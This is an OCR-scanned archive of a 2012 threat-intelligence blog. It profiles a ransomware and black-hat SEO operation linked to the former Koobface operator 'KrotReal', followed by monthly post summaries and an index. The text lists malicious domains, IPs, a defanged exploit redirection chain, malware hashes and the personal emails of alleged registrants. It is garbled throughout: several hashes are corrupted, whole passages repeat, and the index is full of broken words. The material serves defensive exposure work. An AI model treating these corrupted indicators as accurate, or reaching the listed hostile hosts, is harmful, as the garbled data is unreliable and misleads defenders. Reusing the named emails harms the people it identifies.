out of 38 antivirus scanners as Trojan:Win32/Tobfy.H 

Interestingly, the cybercriminals behind the Ransomware left 
the administration panel open to anyone who 

wants to take a look at the way the whole process works. 

Sample screenshot of the administration panel: 
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Second screenshot of the administration panel, showing a 
directory listing, including unique and localized files for 

potential victims from multiple countries: 
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More domains are currently responding to the same 
IPs (176.28.22.32; 176.28.14.42): 

bussinesmail.org - Email: belov28@gmail.com 

elitesecuritynet.com - Email: pescifabio83@yahoo.fi 

ideasdeunion.com - Email: esbornikk@aol.com 

ineverworrynet.com - pescifabio83@yahoo.fi 


testcitycheckers.com - pescifabio83@yahoo.fi 
uneugroup.com - Email: anders_christensen@yahoo.com 
winntegroups.eu - Email: robertobona69@yahoo.com 
sexchatvideo.org - Email: daddario.maria@virgilio.it 
quasarnet.co - Email: valter.bars@venezia.pecavvocati.it 
bestconsultingoffice.com 
apaineal.ru 

What we've got here is a great example of the following - 
when you don't fear legal prosecution for your 
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fraudulent activities over a period of several years, earning 
you potentially hundreds of thousands of dollars, you just 
launch new projects, continuing to cause more harm and 
fraudulently obtain funds from infected victims. 

For those who are interested in more details on the technical 
side of this Ransomware, you should [^con¬ 
sider going through this research. 

Hat tip to Steven Adair from [15]Shadowserver for the 
additional input. 
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Koobface Botnet Master KrotReal Back in Business, 
Distributes Ransomware And Promotes BHSEO Ser¬ 
vice/Product (2012-11-26 03:52) 

On January 09, 2012 I exposed [lJKoobface botnet 
master KrotReal. On January 16, 2012, [2]The New York 
Times went public with data from Facebook Inc. 

exposing the identities of the rest of the group. What 
happened? With the botnet masters still at large, and the 




















Koobface botnet currently offline, a logical question emerges 
- what are 

these cybercriminals up to now that they're no longer 
involved in managing Koobface? 

Cybercrime as usual! 

Continuing to [3]squeeze the cybercrime ecosystem, 

and keep known bad actors on a short leash, in this in¬ 
telligence brief I'll expose [4]Anton Nikolaevich 
Korotchenko a.k.a KrotReal's s latest activities, 
indicating that he's currently busy experimenting with two 
projects: 

• A Black Hat (SEO) Search Engine Optimization related 
service/product 

• Underground traffic exchange/pay-pay-install network 
currently distributing localized Ransomware 

Just like the case when KrotReal's real life identity was 
revealed due to a single mistake he made over a period of 

several years, namely to register a Koobface command and 
control server using his personal GMail account, in this 

intelligence brief I'll once again expose his malicious and 
fraudulent activities by profiling two of the most recently 
domains he once again registered with his personal GMail 
account. 

Let's start by profiling his Black Hat SEO service/product, 
currently hosted on one of the domains he registered in 
2011 . 



trafficconverter.in - 176.9.146.78 - Email: 
krotreal@gmail.com 

Created On:28-Jul-2011 12:37:45 UTC 

Last Updated On:28-Jun-2012 08:11:43 UTC 

Expiration Date:28-Jul-2013 12:37:45 UTC 
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The service/produce apparently allows the systematic abuse 
of legitimate blogging platforms such as Google's 

Blogger and Wordpress, next to Yoom CMS. KrotReal himself 
might be using the tool, or sell/offer access to it as a 

managed service. Does this mean he's not using it by himself 
to monetize the hijacked legitimate traffic that he's 

able to obtain through his Black Hat SEO campaigns? Not at 
all. 

More domains presumably to be used for Black Hat SEO 
purposes registered with KrotReal's personal email 

account (krotreal@gmail.com): 

superstarfind.com 

celeb-search.com 

myown-search.com 

myfindstuff.com 


network-find.com 


coolfind200309.com 


experimentsearch.com 

fashion-overview.com 
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krotpong.com 

adultpartypics.com 

findhunt.com 

How is he actually monetizing the hijacked traffic? Keep 
reading. Now it's time to expose his malicious activi¬ 
ties in the form of spreading localized Ransomware variants. 
For the record, [5]the Koobface gang distributed 

primarly scareware - there's evidence that the group was 
also involved in other [6]malicious campaigns - and even 

[7]bragged about the fact that they're not damaging 
infected user PCs. 

What's particularly interesting about profiling this campaign, 
is that it's a great example of double-layer mone¬ 
tization, as KrotReal is earning revenue through the Traffic 
Holder Adult Affiliate Program, in between serving 

client-side exploits and ultimately dropping Ransomware on 
the affected host using the same redirection chain. 

Sample malicious domain name reconnaissance: 


traffictracker.in - 176.9.146.78 (AS24940) - Email: 
krotreal@gmail.com 

Created On:22-Nov-2011 13:42:53 UTC 

Last Updated On:22-Nov-2012 22:33:25 UTC 

Expiration Date:22-Nov-2013 13:42:53 UTC 

Responding to the same IP 176.9.146.78 (AS24940): 

allcelebrity.ru 

easypereezd.ru 

Sample malicious activity redirection chain: 

hxxp.y/traffictracker. in/in. cgi?l 1 &parameter=nude+girls 
&CS=1 

-> 

hxxp://celeb-search. com/in.php?source=th 
&q=nude+girls 
-> 

hxxp://celeb-search. com/in3.php ?source=th 

&q=nude+girls -> hxxp://www. trafficholder.com/in/in2.php? 
ppillow-pics _erotic -> hxxp://hit. trafficholder. com/cgi- 
bin/traffic/process.fcgi?a=ppillow &c=l &n=pics_erotic &r= 
-> hxxp:/,/gravityexp.com/go.php?sid= 12 -> 
hxxp://nosnowfevere.com/ZqRqk (exploiting [8]CVE-2008- 
5353) -> hxxp://nosnowfevere.com/oxsXAE?KpDzQ=61 -> 
hxxp://nosnowfevere. com/ZqRqk -> 



hxxp://nosno wfe i /ere. com/EHSvFc -> 
hxxp://nosno wfe i /ere. com/XMDrkH 

KrotReal's Traffic Holder Adult Affiliate Network ID is ppillow- 
pics _erotic. 
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Malicious domain names reconnaissance: 
gravityexp.com 

returns 

"Digital 

River 

GmbH" 

on 

its 

home 

page 

46.163.117.144 


Email: 


francesca.muglia.130@istruzione.it 

Updated Date: 30-aug-2012 

Creation Date: 30-aug-2012 

Expiration Date: 30-aug-2013 

nosnowfevere.com - 91.211.119.32 - Email: 
djbroning@definefm.com 

Updated Date: 25-nov-2012 

Creation Date: 25-nov-2012 

Expiration Date: 25-nov-2013 

Upon successful client-side exploitation, the campaign drops 

[9]MD5: d234a238eb8686d08cd4e0b8b705cJal4 

- detected by 10 out of 43 antivirus scanners as 
Trojan. Win lock.7431 

Sample screenshot displayed to users from 
geolocated countries: 
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Second screenshot of a sample page displayed to 
affected U.K users: 
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Additional malicious payload obtained from the 
campaign: 


[10] MD5: fd47fe3659d7604d93c3ce0c0581fed7 - 

detected by 4 out of 44 antivirus scanners as 
Exploit:Java/CVE- 

2012-5076.BBW 

[11] MD5: e47991d7fl72e893317f44ee8afe3811 - 

detected by 5 out of 44 antivirus scanners as JS:Pdfka-gen 
[Expl] 

[12] MD5: 7e58703026c7ffba05ac0d2ae4d3c62f - 

detected by 5 out of 44 antivirus scanners as 
Exploit:Java/CVE- 

2012-1723!generic 

Ransomware C &C malicious domain name 
reconnaissance: 

sarscowoy.com - currently responds to 176.28.22.32 
(AS20773); 176.28.14.42 (AS20773) - Email: 
rmasela@ymail.com On 2012-06-21 the domain responded 
to 204.13.160.28 (AS33626), then on 2012-07-01 it changed 
IPs to 

46.163.113.79 (AS20773), then again on 2012-11-14 it 
changed IP to 176.28.14.42 (AS20773), followed by one last 

change on 2012-11-24 to 176.28.22.32 (AS20773) 

One more MD5 is known to have phoned back to the same 
Ransomware C &C URL - [13]MD5: 

1600577edecelefellc75158f9dd24db detected by 28 
out of 38 antivirus scanners as Trojan:Win32/Tobfy.H 


Interestingly, the cybercriminals behind the Ransomware left 
the administration panel open to anyone who 



wants to take a look at the way the whole process works. 
Sample screenshot of the administration panel: 
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Second screenshot of the administration panel, showing a 
directory listing, including unique and localized files for 

potential victims from multiple countries: 
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More domains are currently responding to the same 
IPs (176.28.22.32; 176.28.14.42): 

bussinesmail.org - Email: belov28@gmail.com 

elitesecuritynet.com - Email: pescifabio83@yahoo.fi 

ideasdeunion.com - Email: esbornikk@aol.com 

ineverworrynet.com - pescifabio83@yahoo.fi 

testcitycheckers.com - pescifabio83@yahoo.fi 

uneugroup.com - Email: anders_christensen@yahoo.com 

winntegroups.eu - Email: robertobona69@yahoo.com 

sexchatvideo.org - Email: daddario.maria@virgilio.it 

quasarnet.co - Email: valter.bars@venezia.pecavvocati.it 

bestconsultingoffice.com 


apaineal.ru 

What we've got here is a great example of the following - 
when you don't fear legal prosecution for your 
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fraudulent activities over a period of several years, earning 
you potentially hundreds of thousands of dollars, you just 
launch new projects, continuing to cause more harm and 
fraudulently obtain funds from infected victims. 

For those who are interested in more details on the technical 
side of this Ransomware, you should [^con¬ 
sider going through this research. 

Hat tip to Steven Adair from [15]Shadowserver for the 
additional input. 
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Summarizing ZDNet's Zero Day Posts for November 
(2012-11-30 15:55) 

The following is a brief summary of all of my posts at 

[1] ZDNet's Zero Day for November, 2012. You can 
subscribe to 

[2] Zero Day's main feed , or follow me on Twitter: 

01. [3]0pera for Mac OS X patches six security vulnerabilities 

02. [4]Cybercriminals start spamvertising Xmas themed 
scams and malware campaigns 

03. [5]Apple releases QuickTime 7.7.3 for Windows, patches 
critical security vulnerabilities 

04. [6]Active XSS flaw discovered on eBay 

05. [7]A patched browser - false feeling of security or a 
security utopia that actually exists? 

This post has been reproduced from [8]Dancho 
Danchev's blog. Follow him [9]on Twitter. 
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Summarizing Webroot's Threat Blog Posts for 
November (2012-12-01 00:31) 

The following is a brief summary of all of my posts at 
[ljWebroot's Threat Blog for November, 2012. You can 
subscribe to my [2]Webroot's Threat Blog RSS Feed 

or follow me on Twitter: 

01. [3]BofA 'Online Banking Passcode Reset' themed emails 
serve client-side exploits and malware 

02. [4]'ADP Immediate Notification' themed emails lead to 
Black Hole Exploit Kit 

03. [5]USPS 'Postal Notification' themed emails lead to 
malware 

04. [6]'Fwd: Scan from a Xerox W. Pro' themed emails lead to 
Black Hole Exploit Kit 

05. [7]'Your Discover Card Services Blockaded' themed 
emails serve client-side exploits and malware 

06. [8]'Payroll Account Holded by Intuit' themed emails lead 
to Black Hole Exploit Kit 

07. [9]'American Express Alert: Your Transaction is Aborted' 
themed emails serve client-side exploits and malware 

08. [10]Cybercriminals abuse major U.S SMS gateways, 
release DIY Mail-to-SMS flooders 

09. [ 11 j'PayPal Account Modified' themed emails lead to 
Black Hole Exploit Kit 


10. [12]Bogus Better Business Bureau themed notifications 
serve client-side exploits and malware 

11. [13]Cybercriminals spamvertise bogus eFax Corporate 
delivery messages, serve multiple malware variants 
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12. [14]Bogus IRS 'Your tax return appeal is declined' themed 
emails lead to malware 

13. [15]'Copies of Missing EPLI Policies' themed emails lead 
to Black Hole Exploit Kit 

14. [16]Cybercriminals spamvertise bogus 'Microsoft License 
Orders' serve client-side exploits and malware 

15. [17]Cybercriminals resume spamvertising 'Payroll 
Account Cancelled by Intuit' themed emails, serve client-side 

exploits and malware 

16. [18]Cybercriminals spamvertise millions of FDIC 'Your 
activity is discontinued' themed emails, serve client-side 

exploits and malware 

17. [19]Cybercriminals release stealthy DIY mass iFrame 
injecting Apache 2 modules 

18. [20]MuItipie 'Inter-company' invoice themed campaigns 
serve malware and client-side exploits 

19. [21]Bogus Facebook 'pending notifications' themed 
emails serve client-side exploits and malware 

20. [22]Cybercriminals target U.K users with bogus 'Pay by 
Phone Parking Receipts' serve malware 



21. [23]Bogus DHL 'Express Delivery Notifications' serve 
malware 

22. [24]Cybercriminals impersonate Vodafone U.K, spread 
malicious MMS notifications 

23. [25]Cybercriminals impersonate T-Mobile U.K, serve 
malware 

24. [26]Bogus 'Meeting Reminder" themed emails serve 
malware 

25. [27]Bogus 'Intuit Software Order Confirmations' lead to 
Black Hole Exploit Kit 

26. [28]Bogus 'End of August Invoices' themed emails serve 
malware and client-side exploits 

This post has been reproduced from [29]Dancho 
Danchev's blog. Follow him [30]on Twitter. 
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Upcoming Portfolio of Commercially Available 
CYBERINT Reports (2012-12-13 13:38) 

Valued blog readers, 

Over the years, you've been exposed to insightful, in-depth, 
"God Eye's View" of some of the most prolific, targeted, and 
trending cyber attacks/cybercriminal schemes, that shaped 
the way we fight and anticipate cybercrime 

campaigns throughout the years. 

Although the production of such publicly available and 
socially oriented content at this blog will continue, it's 

time to raise the stakes even higher - in 2013, I'll be 
systematically making available commercially available 
CYBERINT 

assessments on multiple aspects of the cybercrime 
ecosystem. It's the stuff that will help your decision-making 

process, it's the data to help you prosecute those behind 
these fraudulent operations, it's the tactics and trends you 












don't get to read about anywhere online. 

Please, take 1 second of your precious time, and participate 
in the voting poll on the right side of the blog. 

Enjoy the holidays, and see you all in 2013! 

This post has been reproduced from [lJDancho 
Danchev's blog. Follow him [2Jon Twitter. 
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2. http://twitter.com/danchodanchev 
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Dancho Danchev's Blog Most Popular Posts for 2012 
(2012-12-28 00:26) 

The time has come to reflect on this year's most popular 
posts, and emphasize on the key points about what made 

them special. 

1. [IjWho's Behind the Koobface Botnet? - An OSINT 
Analysis - Indisputably, the exposing of Koobface botnet 

master KrotReal is this year's most popular blog post. The 
release of the post, and the [2]New York Times article 

discussing the case, immediately resulted in the shut down 

of [3]the Koobface botnet. 

2. [4]Exposing the Market for Stolen Credit Cards 
Data - Although the post was originally published in 2011, 
it's the second most popular for 2012, proving that factually 
presenting the existence of a growing trend, inevitably 





reaches a wider audience. 


3. [5]Dissecting 'Operation Ababii' - an OSINT Analysis 

- The OSINT analysis of 'Operation Ababii' is this year's third 
most popular post. The analysis correctly identified a key 
participant in certain parts of the campaign, 

although it explicitly emphasized on the fact just how easy is 
it to launch a [6]cyber false flag operation online. 

4. [7]Profiling a Vendor of Visa/Mastercard Plastics 
and Holograms - The main purpose of this post, was to 
shed more light into the increasing availability of "blank 
plastic" services, whose QA (Quality Assurance) processes 
sometimes outpace the OPSEC (Operational Security) efforts 
put in place by the targeted companies. 

5. [8]Pricing Scheme for a DDoS Extortion Attack - This 
post highlighted a bold, but obtained from "in the wild" 

DDoS extortion letter, indicating the degree of flexibility and 
professionalism applied by the cybercriminals be¬ 
hind it. 

6. [9]A Peek Inside the Vertex Net Loader - This post 
summarized the key features of the Vertex Net Loader, and 
emphasized on the systematic release of related DIY malware 
loaders/bots within the cybercrime ecosystem. 

7. [lOjDissecting the Ongoing Mass SQL Injection 
Attack - Regular readers of my personal blog are used to 
getting the latest threat intelligence regarding a particular 
widespread campaign, virtually in real-time. That was the 

main objective of this analysis, fortunately, successfully 
achieved. 



8 . [ll]Dissecting the Massive SQL Injection Attack 
Serving Scareware - An ever-green analysis demonstrating 

monetization of hijacked Web traffic through a scareware 
affiliate program. 

9. [12]Koobface Botnet Master KrotReal Back in 
Business, Distributes Ransomware And Promotes 
BHSEO Ser¬ 
vice/Product - The second post in the series profiling ex- 
Koobface botnet master KrotReal's cybercrime-friendly 
operations, also gained a lot of attention, and proved that the 
lack of prosecution in this case, can, and will, 

ultimately lead to more cybercrime-friendly activities. 

10. [13]Dissecting 'Operation Ababil' - an OSINT 
Analysis - Part Two - With 'Operation Ababil' still an open 
question to many of the major media outlets, the second part 
of the analysis discussed another tool used in the campaign, 

with the idea to raise more awareness on the tools and 
techniques used by the attackers behind the campaign. 

Thank you all for being regular blog readers! The best is yet 
to come! See you all in 2013! 

This post has been reproduced from [14]Dancho 
Danchev's blog. Follow him [15]on Twitter. 
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Compromised Universities Leads to Fraudulent 
Pharmaceutical Ads ( 2011-03-16 19:30 ) 
S oamvertised United Parcel Service notifications 

serve malware ( 2011-03-23 15:54 ) 

S oamvertised Post Office Express Mail ( LISPS ) 
Emails Servin g Malware (2011-03-25 18:20 ) 
Dissectin g the Massive SOL In j ection Attack 
Servin g Sea reware ( 2011-03-31 19:54 ). 
Dissectin g the Massive SOL In j ection Attack 
Servin g Scareware ( 2011-03-31 19:54 ) 
rN 

S oamvertised DHL Notifications Scareware 

Campai gn ( 2011-04-04 16:44 ) 

Summarizin g Zero Day's Posts for March ( 2011- 
04-04 18:56 ) 

Don't Plav Poker on an Infected Table - Part Four 
( 2011-04-11 18:10 ) 

S oamvertised "Reaest Re j ected" Campai gn 
Servin g Scareware ( 2011-04-12 20:22 ). 
S oamvertised "Successful! Order 977132" Leads 

to Scareware ( 2011-04-28 14:50 ) 

Summarizin g ZDNet's Zero Dav Posts for April 
( 2011-05-09 12:50 ) 
















































































■ Don't Plav Poker on an Infected Table - Part Five 
( 2011-05-09 15:52 ) 

■ A Peek Inside a New DDoS Bot - "Snap" ( 2011- 
05-09 17:03 ) 

■ Keepin g Money Mule Recruiters on a Short Leash 

- Part Seven (2011-05-10 12:41 ) 

■ Keepin g Money Mule Recruiters on a Short Leash 

- Part Ei g ht - Historical OSINT (2011-05-25 
13:18 ) 

■ Keepin g Money Mule Recruiters on a Short Leash 

- Part Ei g ht - Historical OSINT (2011-05-25 
13:18 ) 

■ A Peek Inside the Vertex Net Loader (2011-05-26 
16:34 ) 

■ A Peek Inside the Vertex Net Loader (2011-05-26 
16:34 ) 

■ Keepin g Money Mule Recruiters on a Short Leash 

- Part Nine (2011-05-30 12:09 ) 

■ Keepin g Money Mule Recruiters on a Short Leash 

- Part Nine (2011-05-30 12:09 ) 

June 

■ Summarizin g ZDNet's Zero Dav Posts for Ma v 
( 2011-06-08 16:24 ) 

July. 

■ Summarizin g ZDNet's Zero Dav Posts for l une 
( 2011-07-07 12:24 ) 

■ Keepin g Money Mule Recruiters on a Short Leash 

- Part Ten ( 2011-07-07 13:25 ) 

■ Keepin g Money Mule Recruiters on a Short Leash 

- Part Ten ( 2011-07-07 13:25 ) 

August 

■ Summarizin g ZDNet's Zero Dav Posts for lulv 
( 2011-08-22 18:06 ) 

■ A Peek Inside Web Malware Exploitation Kits 
( 2011-08-29 13:19 ) 






































































■ Keepin g Money Mule Recruiters on a Short Leash 

- Part Eleven ( 2011-08-29 15:51 ) 

■ Keepin g Money Mule Recruiters on a Short Leash 

- Part Eleven ( 2011-08-29 15:51 ) 
o September 

■ Summarizin g 3 Years of Research Into Cvber 
l ihad ( 2011-09-11 13:34 ) 

■ Summarizin g ZDNet's Zero Dav Posts for Au g ust 
( 2011-09-27 19:13 ) 

■ S oamvertised 'Uniform Traffic Ticket 1 and 1 FDIC 
Notifications' Servin g Malware - Historical OSINT 
( 2011-09-28 14:43 ) 

■ S oamvertised 'Uniform Traffic Ticket 1 and 1 FDIC 
Notifications' Servin g Malware - Historical OSINT 
( 2011-09-28 14:43 ) 

o October 

■ Summarizin g ZDNet's Zero Dav Posts for 
Se ptember ( 2011-10-04 14:37 ) 

■ S oamvertised "NACHA security nitification" 
Servin g Malware - H i storical OSINT ( 2011-10-04 
14:38 ) 

■ S oamvertised "IRS notice" Servin g Malware 
( 2011-10-09 19:53 ) 

■ S oamvertised IRS-themed "Last Notice" Emails 

Servin g Malware ( 2011-10-18 21:45 ) 

■ Dissectin g the On g oin g Mass SOL In j ection 
Attack ( 2011-10-20 23:36 ) 

■ Dissectin g the On g oin g Mass SOL In j ection 
Attack ( 2011-10-20 23:36 ) 

■ Exposin g the Market for Stolen Credit Cards Data 
( 2011-10-31 02:07 ) 

o December 

■ Summarizin g ZDNet's Zero Dav Posts for 
October ( 2011-12-04 21:05 ) 

2012 
o January. 













































































■ Summarizin g ZDNet's Zero Dav Posts for 
November (2012-01-01 20:59 ) 

■ Summarizin g ZDNet's Zero Dav Posts for 
December (2012-01-01 21:02 ) 

■ Profilin g a Vendor of Visa/Mastercard Plastics 
and Holo g rams ( 2012-01-03 20:04 ) 

■ Profilin g a Vendor of Visa/Mastercard Plastics 
and Holo g rams ( 2012-01-03 20:04 ) 

■ Who's Behind the Koobface Botnet? - An OSINT 

Analysis ( 2012-01-09 16:59 ) 

■ Who's Behind the Koobface Botnet? - An OSINT 

Analysis ( 2012-01-09 16:59 ) 

Februar y 

■ Summarizin g ZDNet's Zero Dav Posts for l anuar v 
( 2Q12-Q2-Q2 00:59 ) 

■ Summarizin g Webroot's Threat Blo g Posts for 
l anuar v ( 2012-02-02 01:07 ) 

March 

■ Summarizin g ZDNet's Zero Dav Posts for 
Februar y ( 2012-03-07 23:04 ) ' 

■ Summarizin g Webroot's Threat Blo g Posts for 
Februar y ( 2012-03-07 23:18 ) 

April 

■ Summarizin g ZDNet's Zero Dav Posts for March 
( 2012-04-09 19:50 ) 

■ Summarizin g Webroot's Threat Blo g Posts for 
March (2Q12-Q4-Q9 20:03 ) 

May. 

■ Summarizin g ZDNet's Zero Dav Posts for April 
( 2Q12-Q5-Q8 19:20 ) 

■ Summarizin g Webroot's Threat Blo g Posts for 
A pril (2Q12-Q5-Q8 19:31 ) 

■ Dissectin g the On g oin g Client-Side Exploits 
Servin g Lizamoon Mass SOL In j ection Attacks 
( 2Q12-Q5-Q8 21:36 ) 















































































■ Dissectin g the On g oin g Client-Side Exploits 
Servin g Uzamoon Mass SOL In j ection Attacks 
( 2012-05-08 21:36 ) 

June 

■ Summarizin g ZDNet's Zero Dav Posts for Ma v 
( 2012-06-06 18:15 ) 

■ Summarizin g Web root's Threat Blo g Posts for 
Mav ( 2012-06-06 18:31 ) 

July. 

■ Summarizin g ZDNet's Zero Dav Blo g Posts for 
l une ( 2012-07-10 19:02 ) 

■ Summarizin g Webroot's Threat Blo g Posts for 
l une ( 2012-07-10 19:16 ) 

August 

■ Summarizin g ZDNet's Zero Dav Blo g Posts for 
IuIv ( 2012-08-23 18:16 ) 

■ Summarizin g Webroot's Threat Blo g Posts for 
IuIv ( 2012-08-23 19:05 1 

September 

■ Dissectin g 'Operation Ababi1 1 - an OSINT 
Analysis ( 2012-09-28 00:25 ) 

■ Dissectin g 'Operation Ababi 1 1 - an OSINT 
Analysis ( 2012-09-28 00:25 ) 

■ Summarizin g ZDNet's Zero Dav Posts for Au g ust 
( 2012-09-28 01:43 ) 

■ Summarizin g Webroot's Threat Blo g Posts for 
Aug ust ( 2012-09-28 01:54 ) 

October 

■ Summarizin g Webroot's Threat Blo g Posts for 
Se ptember ( 2012-10-01 14:18 ) 

■ Dissectin g 'Operation Ababi 1 1 - an OSINT 
Analysis - Part Two ( 2012-10-26 15:36 ) 

■ Dissectin g 'Operation Ababi 1 1 - an OSINT 
Analysis - Part Two ( 2012-10-26 15:36 ) 

November 
















































































■ Summarizin g ZDNet's Zero Dav Posts for 
October ( 2012-11-02 01:47 ) 

■ Summarizin g Web root's Threat Blo g Posts for 
October ( 2012-11-02 02:34 ) 

■ Mana g ed Embeddin g of Malicious iFrames 
Throu g h Compromised Accounts as a Service 
( 2012-11-24 00:55 ) 

■ Koobface Botnet Master KrotReal Back in 
Business . Distr i butes Ransomware And Promotes 
BHSEO Service/Product (2012-11-26 03:52 1 

■ Koobface Botnet Master KrotReal Back in 
Business . Distributes Ransomware And Promotes 
BHSEO Service/Product ( 2012-11-26 03:52 ) 

■ Summarizin g ZDNet's Zero Dav Posts for 
November ( 2012-11-30 15:55 ) 

December 

■ Summarizin g Webroot's Threat Blo g Posts for 
November ( 2012-12-01 00:31 ) 

■ U pcomin g Portfolio of Commercially Available 
CYBERINT Reports ( 2012-12-13 13:38 ) 

■ Dancho Danchev's Blo g Most Popular Posts for 
2012 ( 2012-12-28 00:26 ) 



















































